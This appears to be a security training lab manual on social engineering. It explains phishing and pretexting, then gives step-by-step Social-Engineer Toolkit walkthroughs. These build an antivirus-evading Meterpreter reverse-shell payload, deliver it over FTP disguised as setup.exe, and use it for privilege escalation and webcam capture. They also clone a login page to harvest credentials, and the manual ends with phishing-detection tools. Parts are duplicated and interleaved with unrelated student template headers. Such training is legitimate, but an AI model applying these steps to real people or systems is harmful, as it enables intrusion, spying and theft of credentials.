Pretexting is the practice of giving fake reasons for actions to obtain information. For example, the
attacker hides their real identity and lies about the purpose of the information they require. The purpose
of the conversation is fabricated to gain access to personal information.
Telephone
E-mail
Instant messaging
Corporate spies
Private investigators
Law enforcement agents
An attacker, when using social engineering, has to use a method or technique to obtain the desired
information. There are various techniques that can be used by the attacker. Some of the commonly used
techniques are:
Authority: The attacker shows authority by pretending to be from an organization such as law
enforcement. The attacker displays confidence in pretending to be someone with authority and
pressurizes the victim to provide information. For example, the attacker may call the reception
and tell the receptionist that he is calling from the police department and needs certain
information.
Urgency: With this technique, a sense of urgency is created, which forces the victim to make a
quick decision without much thought. For example, the attacker may call a victim for the
password to be shared and reset immediately, or his account will be terminated.
Social proof: Social proof is often used when a victim is in a situation they do not know how to
handle. Due to the victim being unsure of what to do, they make decisions by observing others.
There are several ways an attacker can apply this technique to take advantage of the situation by
displaying an act that convinces the victim that this is the correct behavior.
Fear: The attacker uses fear to make the victim do what they want. The attacker creates a
situation in which the victim is forced to act quickly to avoid a dangerous outcome.
Phishing is a social engineering attack that uses technical deception to convince a user to provide
personal information, such as passwords, social security numbers, credit card numbers, and bank
account details. In the phishing attack, the attacker can create a replica Website or Webpage that tricks
the user into providing personal information. The Website or Webpages are such good lookalikes of the
original Website or Webpages that the user gets tricked. The URLs are close to the original, which
most of the time, users don’t bother to check. One of the key reasons behind phishing is financial gain.
Mass mailing: A large audience is targeted. Due to the amount of people targeted, it is highly
likely that at least some will fall for the attack. This method is usually performed using SPAM.
Instant messaging: In recent years, instant messaging has become a more common method of
phishing. Malicious URLs are sent with attractive messages to lure users into clicking them.
Malicious Websites: Phishing can also be initiated through malicious Websites. Sometimes
these are very similar to legitimate websites.
By the end of the fourth stage, the phishing attack is successfully completed. In a phishing attack, the
attacker can use various attack methods. Some of these attack methods are:
Man-In-The-Middle
Session Hijacking
Phishing through Search Engines
Link Manipulation
URL Obfuscation Attacks
Client-side Vulnerabilities
Cross-site Scripting
Malware / Keyloggers / Screen loggers / Trojans
E-mails (Deceptive Phishing)
Hosts File Poisoning
DNS-based Phishing
Content-Injection
There are various reasons for a phishing attack to become successful. Some of the common reasons are:
Lack of knowledge: Users are not trained enough or are completely unaware of the dangers of
phishing attacks. Attackers use this method on several hundreds or thousands of users at once,
and several users fall prey to the attack.
Visual deception: Attackers use a similar URL or domain names with an almost exact replica
of the legitimate Website. Users are deceived with the replica of the Website and without
realizing enter their user credentials, which are then captured by the attacker and used on the
real Website.
Visual Indicators: Users mostly do not pay attention to the URL or the domain name and
therefore, end up being a victim of the phishing attack.
Even though there are several types of phishing attacks, the following are three prominent ones:
Spear Phishing
Spear phishing is focused on specific targets. Unlike standard phishing, it does not focus on the mass
public. In this form of phishing, the attacker takes time to research the target, who typically are from
organizations. The attacker sends out personalized E-mails that typically carry a sense of urgency.
The E-mails are designed to lure the target to click the provided URL. After the URL is clicked,
malware is downloaded, or personal and sensitive information is exposed.
Spear phishing is usually used with the pretexting technique. The attacker gathers information from
various Websites, specifically focusing on social networking sites.
Whaling
Whaling is a form of phishing attack that follows the same process as phishing but targets senior
executives or high-profile candidates within an organization, specifically the CxO candidates.
Pharming
In this type of phishing attack, when a user types the correct URL in the Web browser, the user is
redirected to an exact lookalike Website. The user has not done anything wrong, but the attack has still
occurred. This is done by DNS cache poisoning. The real IP address mapped to the legitimate URL is
changed to an IP address that redirects the user to a malicious Website, which is an exact lookalike.
The user will not be able to suspect anything here because the URL is correct.
Hoax
A hoax email is sent to a high number of recipients with the aim of causing confusion and alarm. They
are usually very convincing and can be quite extreme.
Generally, an alarming or urgent situation is the subject of the email. The recipients are then prompted
to forward the email on to more people.
For example, an email is sent stating that there is a particular computer virus outbreak that causes a lot
of damage and that everyone possible needs to be made aware so certain precautions or actions can be
taken.
The original sender of the hoax does not have a direct gain from the circulation of the email, it is more
to trick, confuse, and panic people.
Shoulder Surfing
Shoulder surfing is a social engineering attack performed by looking over the shoulder of the victim to
retrieve a credit card number, passwords, or any other pertinent information. The attacker directly
observes the information entered by the victim by standing very close or behind the victim or uses
vision-enhancing aids or binoculars to observe from far. Shoulder surfing attackers also use the
technique of fixing up closed-circuit cameras hidden behind the wall or ceiling to obtain sensitive
information.
Baiting
Baiting is an attack that uses CDs, DVDs, or USB drives. It does not use E-mails as the medium but
relies on storage devices. Mostly, the USB drives are used in this scenario. The USB drives are loaded
with malware and placed in places where they are easy to find. For example, an office worker may find
a USB drive in the parking lot of their office with something like “PAYROLL” or “ACCOUNTS”
written on it to entice the finder into using it. When the finder uses the USB drive on the company’s
laptop, the malware is triggered and infects the laptop. Through the laptop, the malware can eventually
spread to the network.
Tailgating
Tailgating is a social engineering act of gaining access to an electronically locked system or a restricted
area by following a user who has legitimate access, with the intention of accessing vulnerable
information. Tailgating is also known as piggybacking.
Social-Engineer Toolkit (SET) is an open-source Python-based toolkit that you can use to perform
social engineering attacks. SET is part of Kali Linux. Using SET, you can perform various attacks,
such as email phishing or Web-based attacks.
Learning Outcomes
After completing this exercise, you will be able to:
Your Devices
You will be using the following devices in this lab. Please power on this device.
To exploit a user’s system, you need first to create a malicious payload, which can be done with SET.
Note: When first logging into the Kali terminal, you might be greeted with a PID session error. This
will not affect your working environment. Simply click on the X button to remove the message and
continue with the lab practical.
Projektni zadatak: Naziv projektnog zadatka58
Ime i prezime, br.index
CS450 – Cloud Computing
Step 1
Ensure you have powered on all the devices listed in the introduction and connect to PLABKALI01.
Username: root
Password: Passw0rd
Figure 2.1 Screenshot of PLABKALI01: Displaying the desktop screen of the Kali Linux.
Step 2
Note: SET provides many tools. In this lab, you will focus on specific tools, but in your spare time, you
are free to try all these tools to enhance your learning.
Figure 2.2 Screenshot of PLABKALI01: Clicking the Terminal icon from the left pane on the desktop.
Step 3
setoolkit
Press Enter.
Figure 2.3 Screenshot of PLABKALI01: Executing the setoolkit command in the command prompt
window.
Step 4
If you are using SET for the first time, you need to accept the terms of service. Type the following
letter:
Press Enter.
Figure 2.4 Screenshot of PLABKALI01: Entering y to Accept the terms of service to start the Social
Engineering Toolkit (SET).
Step 5
You are now on the main menu. You will notice that there are multiple options displayed. Each option
is designed to perform a specific task. For example, you can update the Social Engineering Toolkit by
selecting option 5.
To continue with this task, you will need to select the 1) Social-Engineering Attacks option. Type the
following number:
Press Enter.
Figure 2.5 Screenshot of PLABKALI01: Entering 1 to Select the option 1) Social- Engineering
Attacks.
Step 6
Next, you will see another menu that relates to the Social-Engineering Attacks option. Out of the
given choices, you can choose 4) Create a Payload and Listener. Type the following number:
Press Enter.
Figure 2.6 Screenshot of PLABKALI01: Entering 4 to Select the option 4) Create a Payload and
Listener.
Step 7
Next, you will be prompted to select an option. Out of the given choices, you can choose 5) Windows
Meterpreter Reverse_TCP X64. Type the following number:
Press Enter.
Figure 2.7 Screenshot of PLABKALI01: Entering 5 to Select the option 5) Windows Meterpreter
Reverse_TCP X64 ows x64), Meterpreter payload.
Step 8
You will be prompted to provide the IP address for the payload listener. This is the IP address for your
system, which is the Kali Linux device. In this lab environment, the IP address for the Kali Linux is
192.168.0.4.
For the IP address for the payload listener option, enter the following IP address:
192.168.0.4
Press Enter.
Note: In the real-world environment, you will have a different IP address. You should not be using this
IP address as it is applicable only in this lab environment. If you do not know the IP address of your
Kali Linux, simply open another command prompt window, and run ifconfig. If you know the network
adapter name, then you can run ifconfig eth0, where eth0 is the name of the network adapter. You will
have to check your system.
Figure 2.8 Screenshot of PLABKALI01: Entering the IP address of the Kali Linux for the payload
listener.
Step 9
Next, you will be prompted to enter the port number. Type the following port number in the Enter the
PORT for the reverse listener option:
443
Press Enter.
Figure 2.9 Screenshot of PLABKALI01: Entering the port number for the reverse listener.
Step 10
Notice that the backdooring a legit executable process starts. An executable is now being packaged in a
manner that the antivirus cannot detect it. After the executable is created, it is stored in the /root/.set.
The default name for the file is payload.exe, which you will change after transporting it to the victim’s
system.
You are now prompted to start the payload and listener. Type the following:
yes
Press Enter.
Figure 2.10 Screenshot of PLABKALI01: Entering YES to start the payload and listener.
Step 11
The Metasploit framework now starts. You are now ready to move to the next level, which is sharing
the payload with the victim and then capturing the information when the victim executes the payload.
Figure 2.11 Screenshot of PLABKALI01: Showing the successful start of the payload handler.
Leave the devices you have powered on in their current state and proceed to the next task.
After you have created the payload, you need to share it with the victim. In the real environment, you
will have different methods of transporting this payload to the victim’s system. For example, some of
the common transport methods are:
Since this is a lab environment, you can simulate the download of the file from the FTP server. In real-
world scenarios, the users are likely to download files that they assume are legitimate applications. The
attackers, usually insert the payload in these files that the users download.
In this task, you will setup an FTP server and share the file with the victim.
Step 1
Ensure that you have logged into the Kali Linux system and also ensure that the Metasploit window is
opened. Notice that the payload handler is in running state.
Figure 2.12 Screenshot of PLABKALI01: Showing the successful start of the payload handler.
Step 2
Next, you need to setup an FTP server. There are multiple options. Either you can setup an independent
FTP server or use an auxiliary FTP server of the Metasploit.
use auxiliary/server/ftp
Press Enter.
Figure 2.13 Screenshot of PLABKALI01: Starting the auxiliary FTP server of the Metasploit.
Step 3
Notice that the command prompt is now changed to msf5 auxiliary(server/ftp). You need to set the
FTP root directory now. To do this, type the following command:
Press Enter.
Figure 2.14 Screenshot of PLABKALI01: Setting the FTPROOT directory of the FTP server.
Step 4
Next, you need to type the following command to trigger the payload on the target system:
exploit
Press Enter.
Alert: If you miss this step, you will not be able to connect to the FTP server. This is a critical step.
Step 5
Notice that the command is successful, and the server has started.
Figure 2.16 Screenshot of PLABKALI01: Showing the service listener has started.
Note: Do not close the Metasploit window or VNC window. Leave the devices you have powered on in
their current state and proceed to the next task.
After you have setup the FTP server, you need to download the file on the victim’s system. You do not
need an FTP client to download the file. In this task, you will use the Windows command prompt to
connect to the FTP server.
Note: In the real environment, you will probably not be the one who will be downloading the file on the
victim’s system. You will convince the victim to download the file. For the sake of completing this
exercise, you will download the file from the FTP server to the victim’s system.
Step 1
Figure 2.17 Screenshot of PLABWIN10: Showing the desktop screen of the Windows system.
Step 2
Figure 2.18 Screenshot of PLABWIN10: Selecting the Run option from the context menu.
Step 3
The Run dialog box is displayed. In the Open textbox, type the following:
cmd
Figure 2.19 Screenshot of PLABWIN10: Showing the Run dialog box with the cmd command in the
Open textbox.
Step 4
The command prompt window is displayed. You will now connect with the FTP server and download
the file.
ftp 192.168.0.4
Press Enter.
Figure 2.20 Screenshot of PLABWIN10: Using the command prompt to connect with the FTP server
192.168.0.4.
Step 5
You are now connected with the FTP server. You will now authenticate as the anonymous user. Type
the following name as the User:
anonymous
Press Enter.
Figure 2.21 Screenshot of PLABWIN10: Entering the username as Anonymous to connect with the
FTP server.
Step 6
Next, you are prompted for the password. Leave it blank and press Enter.
Figure 2.22 Screenshot of PLABWIN10: Showing the successful connection with the FTP server
192.168.0.4.
Step 7
You need to now list the files on the FTP server. To be able to do this, type the following command:
dir
Press Enter.
Figure 2.23 Screenshot of PLABWIN10: Listing the files on the FTP server 192.168.0.4.
Step 8
Notice that the command generated an error. This is because of the Windows Security Alert dialog
box, which opened.
Keep the default settings, and click Allow Access to allow the application through the firewall.
Figure 2.24 Screenshot of PLABWIN10: Clicking Allow access on the Windows Security Alert dialog
box.
Step 9
dir
Press Enter. Notice that the payload.exe is present on the FTP server.
Figure 2.25 Screenshot of PLABWIN10: Listing the files on the FTP server 192.168.0.4.
Step 10
binary
Press Enter.
Step 11
Next, transfer the file on to the victim’s system. Type the following command:
get payload.exe
Press Enter.
Figure 2.27 Screenshot of PLABWIN10: Showing the successful transfer of the payload.exe.
Step 12
You can now safely close the FTP server. Type the following command:
quit
Press Enter.
Figure 2.28 Screenshot of PLABWIN10: Entering the quit command to exit from the FTP server.
Step 13
Notice that the FTP prompt is no longer available. You are back on the command prompt. Minimize
the command prompt window.
Figure 2.29 Screenshot of PLABWIN10: Showing the closed session with the FTP server.
Leave the devices you have powered on in their current state and proceed to the next task.
After creating and copying the payload to the user’s system, you need to trigger the payload. In a real-
life scenario, it will be the user who will be triggering the payload. You will now simulate the same
behavior in this task and execute the payload.
Step 1
Windows Defender
Press Enter.
Step 2
In the Windows Defender window, select Open Windows Defender Security Center.
Figure 2.31 Screenshot of PLABWIN10: Displaying opening Windows Defender Security Center.
Step 3
Step 4
In Virus & threat protection select Virus & threat protection settings
Figure 2.33 Screenshot of PLABWIN10: Displaying opening Virus & threat protection settings
Step 5
Step 6
Step 7
Open File Explorer from the taskbar and navigate to the following path:
C:\Users\Administrator.PRACTICELABS
Figure 2.36 Screenshot of PLABWIN10: Showing the successful download of the payload.exe on the
Administrator.PRACTICELABS Windows system in This PC.
Step 8
Figure 2.37 Screenshot of PLABWIN10: Moving the file, payload.exe, to the Downloads folder.
Step 9
Navigate to the Downloads folder. Notice that the payload is now present in this folder.
Figure 2.38 Screenshot of PLABWIN10: Showing the file, payload.exe, in the Downloads folder.
Step 10
Note: You can rename the file by selecting it and pressing F2. In some laptop makes, you may need to
press Fn + F2. Alternatively, you can right-click the file and select Rename.
Step 11
Figure 2.40 Screenshot of PLABWIN10: Clicking the file, setup.exe, to execute it. Closing the File
Explorer Window.
Step 12
Switch back to the Kali Linux window. Notice that the connection with the victim’s system is already
opened.
Note: To be able to complete the next set of tasks in this exercise, you need to keep this console window
open. Do NOT shut it down or exit from it.Alert: If you double-click more than once on the setup file,
more than one meterpreter sessions will be opened.
Figure 2.41 Screenshot of PLABKALI01: Showing a successful connection with the victim’s system
after the setup.exe file is executed.
Leave the devices you have powered on in their current state and proceed to the next task.
The payload is now running on the victim’s system. You need to exploit the victim’s system now.
Step 1
Ensure that you are connected to PLABKALI01. You need to open the session with the victim’s
system now.
sessions -i 1
Press Enter.
Figure 2.42 Screenshot of PLABKALI01: Showing a successful connection with the victim’s system
after the setup.exe file is executed.
Step 2
Notice the interaction with the victim’s system has now started. You are now virtually controlling the
victim’s system. Let’s see the processes that are running on the victim’s system.
ps
Press Enter.
Figure 2.43 Screenshot of PLABWIN10: Entering the ps command to view the running processes.
Step 3
Notice that the processes running on the victim’s system are now displayed. It is important to note the
running process, setup.exe, which is the payload that you have executed on the victim’s system.
Figure 2.44 Screenshot of PLABKALI01: Listing the running processes on the victim’s system.
Step 4
getsystem
Press Enter.
Figure 2.45 Screenshot of PLABKALI01: Showing the success in a privilege escalation on the system.
Step 5
Let’s now check if the victim’s system has a webcam and take a picture. To check this, enter the
following command:
webcam_snap
Press Enter.
Notice the output, which states that the victim’s system does not have a webcam.
Figure 2.46 Screenshot of PLABKALI01: Output showing the victim’s system does not have a
webcam.
Step 6
You can now exit from the meterpreter prompt. Type the following command:
exit
Press Enter.
Figure 2.47 Screenshot of PLABKALI01: Entering the exit command to exit from the meterpreter
prompt.
Step 7
clear
You can also exit from the Metasploit framework prompt. Type the following command:
exit -y
Press Enter.
Note: You have an open session with the target system. Therefore, the exit command will not work. You
need to use the above-mentioned command.
Figure 2.48 Screenshot of PLABKALI01: Entering the exit -y command to exit from the msf5 prompt.
Step 8
A cloned Website is a phishing Website that resembles the original and steals the users credentials, this
is also known as a spoofed Website. In this type of attack, the attacker clones legitimate Websites and
sets up the cloned Website with a URL resembling the legitimate Website’s URL. For example, the
spoofed Website would be www.htomail.com instead of www.hotmail.com, which is the legitimate
Website. The URL of the spoofed Website is shared with the targeted users via E-mail. When the user
clicks on the URL, the user cannot tell the difference between the spoofed or the legitimate Website,
unless the user pays attention to the URL.
In this task, you will set up a spoofed or cloned Website and capture user credentials.
Step 1
Ensure you have powered on all the devices listed in the introduction and connect to PLABKALI01.
Ensure that the terminal window is displayed with the set prompt.
Step 2
There are various methods that you can use to conduct a social engineering attack. In this step, you will
choose Website Attack Vectors, which will allow you to launch an attack using a Website that will be
generated by SET. Type the following:
Press Enter.
Figure 2.51 Screenshot of PLABKALI01: Typing 2 to choose Website Attack Vectors, which will
allow you to launch an attack using a Website that will be generated by SET and pressing Enter.
Step 3
Next, you need to choose a method to clone a Website that requires user credentials from a user. Your
aim is to capture the user credentials that the user will feed into the cloned Website. To be able to do
this, type the following:
Press Enter.
Figure 2.52 Screenshot of PLABKALI01: Typing 3 to choose a method to clone a Website that
requires user credentials from a user and pressing Enter.
Step 4
SET has pre-defined templates of some of the most widely used Websites. Therefore, you would use a
template and clone the Website. To do this, type the following:
Press Enter.
Figure 2.53 Screenshot of PLABKALI01: Typing 1 to select the Web Templates method to clone a
Website based on a template and pressing Enter.
Step 5
192.168.0.4
Press Enter.
Step 6
You need to select the pre-defined template. Press the following key:
Press Enter.
Figure 2.55 Screenshot of PLABKALI01: Typing 3 to select a pre-defined template and pressing Enter.
Step 7
Step 8
Typically, you would send the URL or the cloned Website link to the user via an E-mail. In this lab
environment, you will test out how the process works.
Connect to PLABWIN10
Step 9
Open the Edge browser from the Taskbar and browse to the following site:
http://192.168.0.4
Figure 2.58 Screenshot of PLABWIN10: Displaying browsing to the spoofed web address.
Note: In a real-world scenario, the user would be tricked to browsing to the website impersonating the
original website through an email or a phone call. The malicious attacker will modify the
impersonating website to resemble the original website as close as possible.
Step 10
Notice that the Website is not exactly the replica of Twitter, but it has all the fields that you require to
capture information.
Scroll down to the Username text box, type the following name:
mjfox
password
Note: You can use any username and password. Avoid using a real username and password. If
prompted to save password, click No.
Figure 2.59 Screenshot of PLABWIN10: Entering the user credentials on the displayed Webpage.
Note: After signing in, the page may come up with a Can’t connect securely to this page notice. This
will not affect the PLABKALI01 output.
Step 11
In the terminal window notice that the username and password has been captured.
Figure 2.60: Screenshot of PLABKALI01: Showing the captured user credentials in the terminal
window.
Social engineering is a method to convince a user to share confidential information, which could be
official or personal. For example, you could receive an E-mail claiming that your bank account is
locked or frozen. You need to click on the given URL and provide your credentials to unlock your bank
account. This can be a tricky situation for many users as they get apprehended and without a second
thought, click on the URL and share the user credentials. This method is called Phishing, which is one
of the methods of social engineering covered earlier in this module.
There are several methods that allow you to detect phishing; either by using a toolbar or through a
Website that specializes in detecting phished Websites.
Learning Outcomes
After completing this exercise, you will be able to:
Your Devices
You will be using the following devices in this lab. Please power on this device.
In this task, you will learn to install Firefox. To do this, perform the following steps:
Step 1
Figure 3.1 Screenshot of PLABWIN10: Displaying the PLABWIN10 desktop. Microsoft Edge is
selected.
Step 2
Step 3
Step 4
Figure 3.4 Screenshot of PLABWIN10: Clicking the Firefox Setup 67.0.exe link.
Step 5
Step 6
Figure 3.6 Screenshot of PLABWIN10: Showing a dialog box with the file extraction progress.
Step 7
The Mozilla Firefox Setup dialog box is displayed. On the Welcome to the Mozilla Firefox Setup
Wizard page, click Next.
Figure 3.7 Screenshot of PLABWIN10: Clicking Next on the Welcome to the Mozilla Firefox Setup
Wizard page.
Step 8
On the Setup Type page, keep the default selection and click Next.
Figure 3.8 Screenshot of PLABWIN10: Clicking Next on the Setup Type page.
Step 9
Step 10
Figure 3.10 Screenshot of PLABWIN10: Showing the installation progress on the Installing page.
Step 11
On the Completing the Mozilla Firefox Setup Wizard page, click Finish.
Figure 3.11 Screenshot of PLABWIN10: Clicking Finish on the Completing the Mozilla Firefox Setup
Wizard page.
Step 12
The Netcraft toolbar is designed to protect the users from phishing attacks. It is a Web browser plug-in
which detects a phished Website when you visit it.
In this task, you will learn to install and use the Netcraft toolbar. To do this, perform the following
steps:
Step 1
The Microsoft Edge window opens. In the address bar, type the following URL:
toolbar.netcraft.com
Press Enter.
Figure 3.13 Screenshot of PLABWIN10: Entering the URL for the Netcraft toolbar.
Step 2
Figure 3.14 Screenshot of PLABWIN10: Clicking the Download the Netcraft Extension option.
Step 3
On the Download Now page, scroll down and click the Firefox icon.
Step 4
Step 5
Step 6
Notice that the Netcraft icon is now added on the right side of the toolbar in Microsoft Edge. Click
this icon.
Figure 3.18 Screenshot of PLABWIN10: Showing the Netcraft icon on the right side of the toolbar in
Microsoft Edge.
Step 7
Since you are on the addons.mozilla.org, it provides the details for this Website.
Figure 3.19 Screenshot of PLABWIN10: Clicking the Netcraft icon and finding the result about
Microsoft.com.
Step 8
https://www.exploit-db.com
Press Enter.
Step 9
Click the Netcraft icon. Notice that the details about the Website are now displayed.
Figure 3.21 Screenshot of PLABWIN10: Clicking the Netcraft icon and finding the result about
exploit-db.com.
PhishTank is a Website that contains a repository of the phished Websites. You can simply enter a
URL, and it will provide the details of whether it is phished or not.
In this task, you will use the PhishTank Website. To do this, perform the following steps:
Step 1
https://www.phishtank.com
Press Enter.
Figure 3.22 Screenshot of PLABWIN10: Entering the phishtank.com URL in the address bar.
Step 2
The PhishTank Website is displayed. In the Found a phishing site? text box, type the following URL:
http://testphp.vulnweb.com
Click Is it a phish?
Note: Either you can search for a Website or choose one from the given list.
Figure 3.23 Screenshot of PLABWIN10: Entering a URL to test on the PhishTank website and clicking
the Is it a phish button.
Step 3
Review
Well done, you have completed the Social Engineering Practice Lab.
Summary
You completed the following exercises:
Feedback
Shutdown all virtual machines used in this lab. Alternatively, you can log out of the lab platform.
Introduction
The Conduct a Social Engineering Attack module provides you with the instructions and devices to
develop your hands-on skills in the following topics.
Objectives
Social Engineering
Lab Diagram
During your session, you will have access to the following lab configuration. Depending on the
exercises you may or may not use all the devices, but they are shown here in the layout to get an overall
understanding of the topology of the lab.
In this module, you will be working on the following equipment to carry out the steps defined in each
exercise.
To start, simply choose a device and click Power on. In some cases, the devices may power on
automatically.
For further information and technical support, please see our Help and Support page. Copyright Notice
This document and its content is copyright of Practice-IT - © Practice-IT 2017. All rights reserved.
Any redistribution or reproduction of part or all the contents in any form is prohibited other than the
following:
1. You may print or download to a local hard disk extracts for your personal and non-commercial use
only.
2. You may copy the content to individual third parties for their personal use, but only if you
acknowledge the website as the source of the material. You may not, except with our express written
permission, distribute or commercially exploit the content. Nor may you transmit it or store it in any
other website or other form of electronic retrieval system.
With a little skillset, you can always break someone’s password using various methods, such as brute-
force or dictionary attack. However, it is much easier to trick someone to simply share the password
with you without them even knowing that they have shared it. You can also control their system
without letting them know but you should trick them to install something or open a file, which contains
a specific payload. When you perform such tricks with people, to share their confidential information
or run a malicious file or payload, you are performing a social engineering attack, which is an art of
manipulating people to perform a task that allows you to gain their confidential information or even
control their system.
Please refer to your course material or use your favorite search engine to research for more information
about this topic.
You can perform social engineering using various methods, such as simply talking to the people and
tricking them or use sophisticated method with the help of the Social Engineering Toolkit (SET), which
is a python-driven suite of custom tools that focus on attacking the human element.
Important: SET provides many tools. In this task, you will focus on specific tools but in your spare
time, you are free to try all these tools to enhance your learning.
Step 1
Ensure you have powered on the required devices and connect to PLABKALI01.
Figure 1.1 Screenshot of PLABKALI01: Typing root into the username field on the login screen.
Passw0rd
Figure 1.2 Screenshot of PLABKALI01: Entering the password in the Password text box and then
clicking Sign In.
Ensure that you have logged into the Kali Linux system.
Projektni zadatak: Naziv projektnog zadatka235
Ime i prezime, br.index
CS450 – Cloud Computing
Figure 1.3 Screenshot of PLABKALI01: Showing the taskbar that is correctly displayed once the
viewer has been moved.
Step 2
Projektni zadatak: Naziv projektnog zadatka236
Ime i prezime, br.index
CS450 – Cloud Computing
You can start SET either from the menu or from the command prompt. To start from the menu, click
the first icon from the task bar, select Exploitation Tools, and then select social engineering toolkit.
In this lab, you will use a command to start SET. On the toolbar, double-click Root Terminal.
Step 3
The terminal window is displayed. Enter the following command and press Enter:
setoolkit
Step 4
If you are using SET for the first time, you need to accept the terms of service. Type the following
letter and press Enter.
Figure 1.6 Screenshot of PLABKALI01: Accepting the terms of service to start the Social Engineering
Toolkit (SET).
Step 5
Projektni zadatak: Naziv projektnog zadatka242
Ime i prezime, br.index
CS450 – Cloud Computing
You are now on the main menu. You will notice that there are multiple options displayed. Each option
is designed to perform a specific task. For example, you can update the Social Engineering Toolkit by
selecting the option 5.
To continue with this lab, you will need to select the 1) Social-Engineering Attacks option. Type the
following number and press Enter:
Figure 1.7 Screenshot of PLABKALI01: Selecting the option 1 to choose the Social-Engineering
Attacks.
Step 6
Projektni zadatak: Naziv projektnog zadatka244
Ime i prezime, br.index
CS450 – Cloud Computing
Next, you will see another menu that relate to the Social-Engineering Attacks option. Out of the given
choices, you can choose 4) Create a Payload and Listener. Type the following number and press
Enter:
Figure 1.8 Screenshot of PLABKALI01: Selecting the option 4 to create a payload and listener.
Step 7
Next, you will be prompted to select an option. Out of the given choices, you can choose 5) Windows
Meterpreter Reverse_TCP X64. Type the following number and press Enter:
Figure 1.9 Screenshot of PLABKALI01: Selecting the option 5 to choose Windows Meterpreter
Reverse payload.
Step 8
Projektni zadatak: Naziv projektnog zadatka248
Ime i prezime, br.index
CS450 – Cloud Computing
You will be prompted to provide the IP address for the payload listener. This is the IP address for your
system, which is the Kali Linux. In this lab environment, the IP address for the Kali Linux is
192.168.0.3.
For the IP address for the payload listener option, enter the following IP address and press Enter:
192.168.0.3
Note: In the real environment, you will have a different IP address. You should not be using this IP
address as it is applicable only in this lab environment. If you do not know the IP address of your Kali
Linux, simply open another command prompt window, and run ifconfig. If you know the network
adapter name, then you can run ifconfig eth0, where eth0 is the name of the network adapter. You will
have to check your system.
Figure 1.10 Screenshot of PLABKALI01: Entering the IP address of the Kali Linux for the payload
listener.
Step 9
Projektni zadatak: Naziv projektnog zadatka250
Ime i prezime, br.index
CS450 – Cloud Computing
Next, you will be prompted to enter the port number. Type the following port number in the Enter the
PORT for the reverse listener option and press Enter:
443
Figure 1.11 Screenshot of PLABKALI01: Entering the port number for the reverse listener.
Step 10
Notice that the backdooring a legit executable process starts. An executable is now being packaged in a
manner that the antivirus cannot detect it. After the executable is created, it is stored in the /root/.set.
The default name for the file is payload.exe, which you will change after transporting it to the victim’s
system.
You are now prompted to start the payload and listener. Type the following and press Enter:
yes
Figure 1.12 Screenshot of PLABKALI01: Entering YES to start the payload and listener.
The Metasploit framework now starts. You are now ready to move to the next level, which is sharing
the payload with the victim and then capturing the information when the victim executes the payload.
Projektni zadatak: Naziv projektnog zadatka254
Ime i prezime, br.index
CS450 – Cloud Computing
Note: To be able to complete the next set of tasks in this exercise, you need to keep this console window
open. Do NOT shut it down or exit from it.
Figure 1.13 Screenshot of PLABKALI01: Showing the successful start of the payload handler.
After you have created the payload, you need to share it with the victim. In the real environment, you
will have different methods of transporting this payload to the victim’s system. For example, some of
the common transport methods are:
E-mail - attach the payload with an E-mail and send it to the victim.
USB - copy the payload in a USB and when the victim plugs-in the USB in the system, it can be
triggered.
Download - keep the infected file in a download repository from where the victim downloads
the payload.
FTP - Share it through FTP - making it look like a legitimate file.
In this task, you will setup an FTP server and share the file with the victim.
Important: SET provides many tools. In this task, you will focus on specific tools but in your spare
time, you are free to try all these tools to enhance your learning.
Step 1
Ensure that you have logged into the Kali Linux system and also ensure that the Metasploit window is
opened. Notice that the payload handler is in running state.
Figure 1.14 Screenshot of PLABKALI01: Showing the successful start of the payload handler.
Step 2
Next, you need to first setup an FTP server. There are multiple options. Either you can setup an
independent FTP server or use an auxiliary FTP server of the Metasploit. To setup the FTP server, type
the following command and press Enter:
use auxiliary/server/ftp
Figure 1.15 Screenshot of PLABKALI01: Starting the auxiliary FTP server of the Metasploit.
Step 3
Notice that the command prompt is now changed to msf auxiliary(ftp). You need to now set the FTP
root directory. To do this, type the following command and press Enter:
Figure 1.16 Screenshot of PLABKALI01: Setting the FTPROOT directory of the FTP server.
Step 4
Next, you need to type the following command and press Enter:
exploit
Note: If you miss this step, you will not be able to connect to the FTP server. This is a critical step.
Step 5
Connect to PLABWIN10.
Figure 1.18 Screenshot of PLABWIN10: Showing the desktop screen of the Windows system.
Projektni zadatak: Naziv projektnog zadatka265
Ime i prezime, br.index
CS450 – Cloud Computing
Leave the devices you have powered on in their current state and proceed to the next task.
After you have setup the FTP server, you need to next download the file on the victim’s system. You
do not need an FTP client to download the file. In this task, you will use the Windows command
prompt to connect to the FTP server.
Note: In the real environment, you will probably not be the one who will be downloading the file on the
victim’s system. You will convince the victim to download the file. For the sake of completing this
exercise, you will download the file from the FTP server to the victim’s system.
Step 1
Figure 1.19 Screenshot of PLABWIN10: Showing the desktop screen of the Windows system.
Step 2
Figure 1.20 Screenshot of PLABWIN10: Selecting the Run options from the menu.
Step 3
The Run dialog box is displayed. In the Open textbox, type the following and press Enter:
cmd
Figure 1.21 Screenshot of PLABWIN10: Showing the Run dialog box with the cmd command in the
Open textbox.
Step 4
Projektni zadatak: Naziv projektnog zadatka270
Ime i prezime, br.index
CS450 – Cloud Computing
The command prompt window is displayed. You will now connect with the FTP server and download
the file.
To connect with the FTP server, type the following command and press Enter:
ftp 192.168.0.3
Figure 1.22 Screenshot of PLABWIN10: Using the command prompt to connect with the FTP server
192.168.0.3.
Step 5
Projektni zadatak: Naziv projektnog zadatka272
Ime i prezime, br.index
CS450 – Cloud Computing
You are now connected with the FTP server. You will now authenticate as the anonymous user. Type
the following name as the User and press Enter:
anonymous
Figure 1.23 Screenshot of PLABWIN10: Entering the user name as Anonymous to connect with the
FTP server.
Step 6
Projektni zadatak: Naziv projektnog zadatka274
Ime i prezime, br.index
CS450 – Cloud Computing
Next, you are prompted for the password. Leave it blank and press Enter.
Figure 1.24 Screenshot of PLABWIN10: Entering the password to authenticate the Anonymous user.
Figure 1.25 Screenshot of PLABWIN10: Showing the successful connection with the FTP server
192.168.0.3.
Projektni zadatak: Naziv projektnog zadatka276
Ime i prezime, br.index
CS450 – Cloud Computing
Step 7
You need to now list the files on the FTP server. To be able to do this, type the following command
and press Enter:
dir
Figure 1.26 Screenshot of PLABWIN10: Listing the files on the FTP server 192.168.0.3.
Step 8
Now, set the transfer to binary. Type the following command and press Enter:
binary
Step 9
Next, transfer the file on to the victim’s system. Type the following command and press Enter:
get payload.exe
Figure 1.28 Screenshot of PLABWIN10: Downloading the payload.exe file using the GET command.
Step 10
You can now safely close the FTP server. Type the following command and press Enter:
quit
Notice that the FTP prompt is now longer available. You are back on the command prompt.
